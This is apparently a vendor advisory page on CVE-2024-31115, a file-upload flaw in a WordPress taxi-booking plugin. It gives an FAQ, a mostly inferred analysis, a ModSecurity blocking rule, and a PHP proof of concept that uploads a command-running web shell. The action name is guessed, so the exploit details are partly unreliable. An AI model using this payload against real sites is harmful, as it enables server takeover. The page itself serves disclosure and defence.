What is CVE-2024-31115?

CVE-2024-31115 is a critical vulnerability in the Chauffeur Taxi Booking System plugin for WordPress, allowing unauthenticated arbitrary file uploads. This occurs due to a lack of file type validation, enabling attackers to upload malicious files to the server.

How does this vulnerability work?

The vulnerability allows attackers to send a POST request to a specific AJAX endpoint in the plugin, uploading any file type without validation. This can lead to remote code execution if a PHP web shell is uploaded.

Who is affected by this vulnerability?

Any WordPress site using the Chauffeur Taxi Booking System plugin version 7.2 or lower is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they are at risk.

How can I check if my site is vulnerable?

Check the version of the Chauffeur Taxi Booking System plugin installed on your WordPress site. If it is version 7.2 or earlier, your site is vulnerable to this exploit.

What is the risk level of this vulnerability?

The CVSS score of 10.0 indicates a critical risk level, meaning that an attacker can exploit this vulnerability without authentication, potentially leading to full server compromise.

How can I fix or mitigate this issue?

Upgrade the Chauffeur Taxi Booking System plugin to version 7.3 or later, where proper file validation has been implemented. Additionally, consider implementing server-side protections and restricting file uploads.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, disable the plugin to prevent exploitation. You can also implement firewall rules to block access to the vulnerable AJAX endpoint.

What does the proof of concept demonstrate?

The proof of concept shows how an attacker can exploit the vulnerability by uploading a PHP web shell through the AJAX upload functionality. This highlights the ease of exploitation due to the lack of authentication checks.

What are the consequences of exploitation?

If exploited, an attacker could upload a web shell, execute arbitrary commands, access sensitive files, and potentially gain administrative access to the WordPress site, leading to complete compromise.

How can I further secure my WordPress site?

Implement security best practices such as using a web application firewall, regularly updating all plugins and themes, and conducting security audits to identify vulnerabilities.

Where can I find more information about this vulnerability?

Detailed information can be found on the official CVE database, security blogs, and the documentation of the Chauffeur Taxi Booking System plugin. Staying informed about security updates is crucial.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 25, 2026

CVE-2024-31115: Chauffeur Taxi Booking System for WordPress <= 7.2 – Unauthenticated Arbitrary File Upload (chauffeur-booking-system)

CVE ID CVE-2024-31115

Plugin chauffeur-booking-system

Severity Critical (CVSS 10.0)

CWE 434

Vulnerable Version 7.2

Patched Version —

Disclosed March 28, 2024

Analysis Overview

Atomic Edge analysis of CVE-2024-31115 (metadata-based):

This vulnerability allows unauthenticated arbitrary file upload in the Chauffeur Taxi Booking System plugin for WordPress versions up to and including 7.2. The CVSS score of 10 and the CWE-434 classification indicate a critical severity file upload vulnerability with no authentication or user interaction requirements. The affected component is likely an AJAX handler or a custom file upload endpoint exposed by the plugin.

The root cause, inferred from CWE-434 and the description, is missing file type validation in a file upload function. WordPress plugins commonly implement file uploads via AJAX actions hooked to ‘wp_ajax_{action}’ and ‘wp_ajax_nopriv_{action}. The absence of file extension checks, MIME type validation, or content inspection allows any file (including PHP shells) to be uploaded. Since no source code is available, this is an inferred conclusion based on the CWE classification and typical WordPress plugin patterns.

Exploitation likely involves sending a POST request to /wp-admin/admin-ajax.php with an action parameter specific to the plugin (e.g., ‘chauffeur_upload_file’ or similar) and a file parameter containing a malicious PHP file. Because the vulnerability is unauthenticated, the ‘nopriv’ AJAX hook must be registered, meaning no nonce or capability check is required. An attacker can upload a web shell directly to the WordPress uploads directory or a plugin-specific directory, then access it via a browser to execute arbitrary commands on the server.

The remediation, as seen in version 7.3, likely involves implementing proper file type validation: checking file extensions against an allowlist (e.g., only jpg, png, pdf), validating MIME types server-side, using getimagesize() for images, and storing files outside the web root with restricted execution permissions. Additional hardening should include requiring authentication and capability checks for upload actions.

Impact is critical: unauthenticated arbitrary file upload leading to remote code execution. An attacker can upload a PHP web shell, execute system commands, read/write any WordPress file, access the database, escalate privileges to administrator, and fully compromise the site and its server.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-31115 (metadata-based)
# Virtual patch: block unauthenticated file upload via inferred AJAX action
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202431115,phase:2,deny,status:403,chain,msg:'CVE-2024-31115 Chauffeur Taxi Booking System - Unauthenticated File Upload',severity:'CRITICAL',tag:'CVE-2024-31115'"
  SecRule ARGS_POST:action "@streq chauffeur_upload_file" "chain"
    SecRule FILES:file "@rx .(php|phtml|php3|php4|php5|php7|pht|shtml|cgi|asp|aspx|jsp|cfm|inc|pl|py)$" 
      "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-31115 - Chauffeur Taxi Booking System for WordPress <= 7.2 - Unauthenticated Arbitrary File Upload

<?php

$target_url = "http://example.com";  // CHANGE THIS to the target WordPress site URL

$shell_content = '<?php system($_GET["cmd"]); ?>';
$file_name = 'shell.php';

$payload = array(
    'action' => 'chauffeur_upload_file',  // Inferred AJAX action from plugin slug
    'file' => new CURLFile('data://text/plain;base64,' . base64_encode($shell_content), 'application/x-php', $file_name)
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsen";
echo "If successful, access the shell at: $target_url/wp-content/uploads/$file_name?cmd=idn";

?>

Frequently Asked Questions

What is CVE-2024-31115?
Understanding the vulnerability
CVE-2024-31115 is a critical vulnerability in the Chauffeur Taxi Booking System plugin for WordPress, allowing unauthenticated arbitrary file uploads. This occurs due to a lack of file type validation, enabling attackers to upload malicious files to the server.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a POST request to a specific AJAX endpoint in the plugin, uploading any file type without validation. This can lead to remote code execution if a PHP web shell is uploaded.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Chauffeur Taxi Booking System plugin version 7.2 or lower is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
Check the version of the Chauffeur Taxi Booking System plugin installed on your WordPress site. If it is version 7.2 or earlier, your site is vulnerable to this exploit.
What is the risk level of this vulnerability?
Understanding the CVSS score
The CVSS score of 10.0 indicates a critical risk level, meaning that an attacker can exploit this vulnerability without authentication, potentially leading to full server compromise.
How can I fix or mitigate this issue?
Recommended actions
Upgrade the Chauffeur Taxi Booking System plugin to version 7.3 or later, where proper file validation has been implemented. Additionally, consider implementing server-side protections and restricting file uploads.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, disable the plugin to prevent exploitation. You can also implement firewall rules to block access to the vulnerable AJAX endpoint.
What does the proof of concept demonstrate?
Illustration of the vulnerability
The proof of concept shows how an attacker can exploit the vulnerability by uploading a PHP web shell through the AJAX upload functionality. This highlights the ease of exploitation due to the lack of authentication checks.
What are the consequences of exploitation?
Potential impacts on your site
If exploited, an attacker could upload a web shell, execute arbitrary commands, access sensitive files, and potentially gain administrative access to the WordPress site, leading to complete compromise.
How can I further secure my WordPress site?
Best practices for security
Implement security best practices such as using a web application firewall, regularly updating all plugins and themes, and conducting security audits to identify vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
Detailed information can be found on the official CVE database, security blogs, and the documentation of the Chauffeur Taxi Booking System plugin. Staying informed about security updates is crucial.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations